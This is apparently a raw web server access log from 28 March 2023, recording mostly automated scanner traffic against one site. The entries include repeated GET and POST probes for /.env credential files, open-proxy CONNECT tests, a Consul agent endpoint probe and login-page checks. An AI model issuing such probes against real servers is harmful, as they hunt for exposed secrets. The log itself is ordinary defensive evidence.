190.211.252.122 - - [28/Mar/2023:17:26:48 +0000] "CONNECT pro.ip-api.com:443 HTTP/1.1" 405 405308 "-" "-"
185.225.74.42 - - [28/Mar/2023:17:50:50 +0000] "GET / HTTP/1.1" 200 8384 "-" "Linux Gnu (cow)"
141.98.6.119 - - [28/Mar/2023:18:02:06 +0000] "CONNECT google.com:443 HTTP/1.1" 405 405373 "-" "Go-http-client/1.1"
43.154.128.189 - - [28/Mar/2023:18:10:45 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [28/Mar/2023:18:10:47 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.246.110 - - [28/Mar/2023:18:17:58 +0000] "POST / HTTP/1.1" 405 409722 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [28/Mar/2023:18:21:00 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [28/Mar/2023:18:21:00 +0000] "\x16\x03\x01\x01H\x01" 400 226 "-" "-"
109.237.97.180 - - [28/Mar/2023:18:21:01 +0000] "POST /.env HTTP/1.1" 405 411967 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
95.215.233.250 - - [28/Mar/2023:19:00:51 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.254.196.173 - - [28/Mar/2023:19:04:15 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [28/Mar/2023:19:04:16 +0000] "POST / HTTP/1.1" 405 409706 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.229.110.65 - - [28/Mar/2023:19:13:57 +0000] "\x16\x03\x01\x02" 400 226 "-" "-"
138.68.93.52 - - [28/Mar/2023:19:15:49 +0000] "GET /v1/agent/self HTTP/1.1\n" 400 226 "-" "-"
51.158.37.186 - - [28/Mar/2023:19:17:50 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.158.37.186 - - [28/Mar/2023:19:17:51 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.158.37.186 - - [28/Mar/2023:19:17:51 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
47.254.255.160 - - [28/Mar/2023:19:28:01 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.254.255.160 - - [28/Mar/2023:19:28:02 +0000] "POST / HTTP/1.1" 405 409744 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [28/Mar/2023:19:30:23 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
167.94.138.51 - - [28/Mar/2023:19:34:36 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.51 - - [28/Mar/2023:19:34:47 +0000] "PRI * HTTP/2.0" 400 226 "-" "-"
167.94.138.51 - - [28/Mar/2023:19:34:47 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.51 - - [28/Mar/2023:19:34:48 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.51 - - [28/Mar/2023:19:34:48 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
